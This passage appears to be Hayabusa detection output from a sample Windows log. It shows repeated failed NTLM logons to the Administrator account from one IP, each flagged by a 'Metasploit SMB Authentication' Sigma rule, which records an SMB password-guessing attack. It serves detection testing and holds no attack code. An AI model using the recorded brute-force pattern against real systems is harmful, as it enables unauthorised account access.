SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: 
